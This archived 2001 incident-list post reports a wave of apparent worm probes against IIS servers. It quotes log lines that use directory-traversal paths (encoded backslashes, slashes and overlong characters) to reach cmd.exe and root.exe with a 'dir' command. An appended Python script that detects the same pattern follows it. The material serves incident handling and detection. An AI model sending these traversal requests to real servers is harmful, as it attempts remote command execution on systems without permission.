command execution attempts

From: Keith.Morgan (Keith.Morganat_private)
Date: Tue Sep 18 2001 - 06:59:23 PDT


    Wow.  This morning we've been hit with a deluge of attempts at
    ....../cmd.exe?<args here> and attempts to access ...../root.exe?<args here>
    
    My IDS is going haywire.  They're coming from diverse IPs, mostly in the
    216.* class A.  This doesn't appear to be a standard code-red type thing.
    Have a look at log excerpts...
    
    This all appeared to kick off at roughly 9AM EST.  Have I missed some
    prolific worm out there?  
    
    2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 -
    2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 401 -
    2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:38:11 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
    
    
    All of the offending IPs are following this exact pattern, indicating a
    worm.  
    
    Keith T. Morgan
    Chief of Information Security
    Terradon Communications
    keith.morganat_private
    304-755-8291 x142
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
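    A small detector for the probe pattern quoted in the post, written as an added example (not code from the poster or the list): it parses IIS W3C extended log lines, percent-decodes each URI stem until it is stable so that %5c, %2f and double-encoded variants collapse to the same path, flags traversal segments and cmd.exe/root.exe targets, and groups hits per source IP. The field order and the sample lines (server IP 10.0.0.5, the benign 10.1.2.3 requests, the %255c variant) are constructed assumptions.

```python
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in the W3C extended format the post quotes.
# Assumed field order: date time c-ip cs-username s-ip s-port cs-method
# cs-uri-stem cs-uri-query sc-status sc-win32-status
SAMPLE_LOG = """\
2001-09-18 13:38:01 216.230.91.177 - 10.0.0.5 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - 10.0.0.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - 10.0.0.5 80 GET /msadc/..%255c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:11 216.230.91.177 - 10.0.0.5 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:12 10.1.2.3 - 10.0.0.5 80 GET /default.htm - 200 -
2001-09-18 13:38:13 10.1.2.3 - 10.0.0.5 80 GET /images/logo.gif - 200 -
"""

SUSPICIOUS_FILES = {"cmd.exe", "root.exe"}

def normalize_path(uri_stem):
    """Percent-decode until stable (catches %255c double-encoding),
    then fold backslashes so '..%5c..' and '..%2f..' compare equal."""
    prev, cur = None, uri_stem
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/").lower()

def classify(uri_stem):
    """Return the reasons a request path looks like a cmd.exe/root.exe probe."""
    path = normalize_path(uri_stem)
    reasons = []
    if ".." in path.split("/"):
        reasons.append("traversal")
    if path.rsplit("/", 1)[-1] in SUSPICIOUS_FILES:
        reasons.append("shell-exec")
    return reasons

def scan(log_text):
    """Parse W3C lines; return {client_ip: set(reasons)} for hits only."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 11:
            continue  # skip directives and malformed lines
        client_ip, uri_stem, uri_query = fields[2], fields[7], fields[8]
        reasons = classify(uri_stem)
        if reasons and uri_query.startswith("/c+"):
            reasons.append("cmd-arg")  # a command was passed as the query
        if reasons:
            hits[client_ip].update(reasons)
    return dict(hits)

if __name__ == "__main__":
    for ip, why in scan(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(sorted(why))}")
```

Because normalization happens before matching, one rule covers every encoding variant in the excerpt, and the per-IP grouping makes the "same sequence from many sources" signature the poster describes visible at a glance.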
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:41:12 PDT